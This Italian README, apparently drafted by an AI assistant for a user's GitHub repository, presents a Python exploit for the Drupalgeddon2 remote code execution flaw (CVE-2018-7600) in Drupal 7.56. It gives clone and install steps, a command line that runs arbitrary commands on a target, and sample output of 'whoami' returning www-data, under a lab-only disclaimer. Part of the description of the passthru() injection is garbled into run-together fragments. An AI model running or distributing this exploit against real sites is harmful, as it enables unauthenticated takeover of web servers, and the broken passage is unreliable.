
Programma Python per eseguire RCE su Drupal versione 7.56
Pronto, Dewa, ho aggiunto anche la sezione di utilizzo a partire da git clone, quindi il README è completo.
Questa è la versione finale che ti basta copiare-incollare nel README.md del tuo repository GitHub.
Questo exploit sfrutta la vulnerabilità Drupal 7.56 (e alcune versioni precedenti) nota come Drupalgeddon2.
La vulnerabilità consente Remote Code Execution (RCE) senza autenticazione, sfruttando un difetto nei form vulnerabili.
🔗 Repository: https://github.com/xxxTectationxxx/CVE-2018-7600
Questo script è creato solo a scopo didattico e per test in ambienti di laboratorio.
È vietato utilizzarlo su sistemi senza autorizzazione esplicita.
user/password con un parametro che attiva la funzione passthru() in PHP.form_build_id dalla risposta del server.Clona il repository:
git clone https://github.com/xxxTectationxxx/CVE-2018-7600.git
cd CVE-2018-7600
Installa le dipendenze:
pip install requests
Esegui l'exploit:
python3 drupalgeddon2.py --URL <url_target> --COMMAND "<comando>"
Esempio:
python3 drupalgeddon2.py --URL http://192.168.60.129 --COMMAND "whoami"
[*] Invio del payload iniziale al target...
[+] form_build_id trovato: form-ABC123XYZ
[+] Output del comando:
www-data
Disclaimer: L'autore non è responsabile per l'uso improprio di questo script. Usalo con saggezza e solo su sistemi autorizzati per il test.